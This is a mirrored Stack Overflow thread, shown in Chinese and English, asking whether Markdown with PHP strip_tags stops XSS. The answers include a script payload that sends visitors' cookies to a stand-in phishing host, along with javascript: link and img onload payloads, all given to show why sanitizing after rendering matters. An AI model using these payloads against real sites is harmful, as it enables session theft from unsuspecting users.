Markdown(带有 strip_tags)足以阻止 XSS 攻击吗?

发布于 2024-07-30 06:15:25 字数 573 浏览 5 评论 0原文

我正在开发一个 Web 应用程序,该应用程序允许用户输入目录中项目的简短描述。 我允许在我的文本区域中使用 Markdown,以便用户可以进行一些 HTML 格式设置。

我的文本清理功能会在将任何输入的文本插入数据库之前删除所有标签:

public function sanitizeText($string, $allowedTags = "") {
    $string = strip_tags($string, $allowedTags);

    if(get_magic_quotes_gpc()) {
        return mysql_real_escape_string(stripslashes($string));
    } else {
        return mysql_real_escape_string($string);
    }
}

本质上,我在数据库中存储的所有内容都是 Markdown - 不允许其他 HTML,甚至允许“基本 HTML”(如此处的 SO)。

允许降价会带来任何安全威胁吗? 即使 Markdown 没有标签,它也可以被 XSS 攻击吗?

I'm working on a web application that allows users to type short descriptions of items in a catalog. I'm allowing Markdown in my textareas so users can do some HTML formatting.

My text sanitization function strips all tags from any inputted text before inserting it in the database:

public function sanitizeText($string, $allowedTags = "") {
    $string = strip_tags($string, $allowedTags);

    if(get_magic_quotes_gpc()) {
        return mysql_real_escape_string(stripslashes($string));
    } else {
        return mysql_real_escape_string($string);
    }
}

Essentially, all I'm storing in the database is Markdown--no other HTML, even "basic HTML" (like here at SO) is allowed.

Will allowing markdown present any security threats? Can markdown be XSSed, even though it has no tags?

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(7

忆伤 2024-08-06 06:15:25

这是一个可爱的例子,说明了为什么您需要在之后而不是之前清理 HTML:

Markdown 代码:

>  <script type="text/javascript"
>  language="js">i=new Image\(\); i.src='http://phishingwebsite.example.com/?l='
> + escape\(window.location\) + '&c=' + escape\(document.cookie\);
> </script>
>

呈现为:

<blockquote> 
<p><script type="text/javascript"
 language="js">i=new Image(); i.src='http://phishingwebsite.example.com/?l='
+ escape(window.location) + '&c=' + escape(document.cookie);
</script></p> 
</blockquote> 

现在您担心吗?

Here's a lovely example of why you need to sanitize the HTML after, not before:

Markdown code:

>  <script type="text/javascript"
>  language="js">i=new Image\(\); i.src='http://phishingwebsite.example.com/?l='
> + escape\(window.location\) + '&c=' + escape\(document.cookie\);
> </script>
>

Rendered as:

<blockquote> 
<p><script type="text/javascript"
 language="js">i=new Image(); i.src='http://phishingwebsite.example.com/?l='
+ escape(window.location) + '&c=' + escape(document.cookie);
</script></p> 
</blockquote> 

Now are you worried?

残疾 2024-08-06 06:15:25

我认为从输入中剥离任何 HTML 标签会给你带来相当安全的东西——除非有人找到一种方法将一些真正混乱的数据注入到 Markdown 中,让它生成一些更混乱的输出 ^^

不过,这里有两个我想到的事情:

第一个: strip_tags 不是一个奇迹功能:它有一些缺陷......

例如,在这样的情况下,它会删除“<”之后的所有内容:

$str = "10 appels is <than 12 apples";
var_dump(strip_tags($str));

我得到的输出是:

string '10 appels is ' (length=13)

这对您的用户来说不太好 :-(

< br>
第二个:有一天或另一天,您可能想要允许一些 HTML 标签/属性; 或者,即使在今天,您可能也想确保 Markdown 不会生成一些 HTML 标签/属性。

您可能对 HTMLPurifier 感兴趣:它允许您指定应保留哪些标签和属性,并过滤字符串,这样就只剩下那些了。

它还生成有效的 HTML 代码——这总是很好;-)

I think stripping any HTML tag from the input will get you something pretty secure -- except if someone find a way to inject some really messed up data into Markdown, having it generate some even more messed-up output ^^

Still, here are two things that come to my mind :

First one : strip_tags is not a miracle function : it has some flaws...

For instance, it'll strip everything after the '<', in a situation like this one :

$str = "10 appels is <than 12 apples";
var_dump(strip_tags($str));

The output I get is :

string '10 appels is ' (length=13)

Which is not that nice for your users :-(

Second one : One day or another, you might want to allow some HTML tags/attributes ; or, even today, you might want to be sure that Markdown doesn't generate some HTML Tags/attributes.

You might be interested by something like HTMLPurifier : it allows you to specify which tags and attributes should be kept, and filters a string, so that only those remain.

It also generates valid HTML code -- which is always nice ;-)

红颜悴 2024-08-06 06:15:25

在渲染 Markdown 后清理生成的 HTML 将是最安全的。 如果不这样做,我认为人们可以在 Markdown 中执行任意 Javascript,如下所示:

[Click me](javascript:alert\('Gotcha!'\);)

PHP Markdown 将其转换为:

<p><a href="javascript:alert('Gotcha!');">Click me</a></p>

哪个可以完成这项工作。 ...甚至不要考虑开始添加代码来处理这些情况。 正确的清理并不容易,只需使用一个好的工具并在将 Markdown 渲染为 HTML 后应用它即可。

Sanitizing the resulting HTML after rendering the Markdown is going to be safest. If you don't, I think that people would be able execute arbitrary Javascript in Markdown like so:

[Click me](javascript:alert\('Gotcha!'\);)

PHP Markdown converts this to:

<p><a href="javascript:alert('Gotcha!');">Click me</a></p>

Which does the job. ...and don't even think about beginning to add in code to take care of these cases. Correct sanitization isn't easy, just use a good tool and apply it after you render your Markdown into HTML.

贪了杯 2024-08-06 06:15:25

不,您使用 Markdown 的方式并不安全。 Markdown 可以安全使用,但你必须正确使用它。 有关如何安全使用 Markdown 的详细信息,请参阅此处。 有关如何安全使用它的详细信息,请参阅链接,但简短的版本是:使用最新版本、设置 safe_mode 和设置 enable_attributes=False

该链接还解释了为什么转义输入然后调用 Markdown(正如您所做的那样)不足以保证安全。 简短示例:“[clickme](javascript:alert%28%22xss%22%29)”。

No. The way you are using Markdown is not secure. Markdown can be used securely, but you have to use it right. For details on how to use Markdown securely, look here. See the link for details about how to use it safely, but the short version is: it is important to use the latest version, to set safe_mode, and to set enable_attributes=False.

The link also explains why escaping the input and then calling Markdown (as you are doing) is not sufficient to be secure. Short example: "[clickme](javascript:alert%28%22xss%22%29)".

献世佛 2024-08-06 06:15:25

允许降价呈现任何
安全威胁? 降价可以吗
XSSed,即使它没有标签?

在这方面几乎不可能做出绝对的陈述——谁能说清楚 Markdown 解析器会被足够畸形的输入欺骗到什么程度呢?

然而,风险可能非常低,因为它的语法相对简单。 最明显的攻击角度是 javascript: 链接或图像中的 URL——解析器可能不允许,但我会检查一下。

Will allowing markdown present any
security threats? Can markdown be
XSSed, even though it has no tags?

It's almost impossible to make absolute statements in that regard - who can say what the markdown parser can be tricked into with sufficiently malformed input?

However, the risk is probably very low, since it is a relatively simple syntax. The most obvious angle of attack would be javascript: URLs in links or images - probably not allowed by the parser, but it's something I'd check out.

绳情 2024-08-06 06:15:25

我同意 Pascal MARTIN 的观点,即 HTML 清理是一种更好的方法。 如果您想完全用 JavaScript 完成此操作,我建议您查看 google-caja 的清理库源代码) 。

I agree with Pascal MARTIN that HTML Sanitization is a better approach. If you want to do it entirely in JavaScript I suggest taking a look at google-caja's sanitization library (source code).

Smile简单爱 2024-08-06 06:15:25

BBcode 提供了更多安全性,因为您正在生成标签。

如果 是允许的,这将直接通过 strip_tags ;) Bam !

BBcode provides more safety because you are generating the tags.

<img src="" onload="javascript:alert(\'haha\');"/>

If <img> is allowed, this will go straight through strip_tags ;) Bam !

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文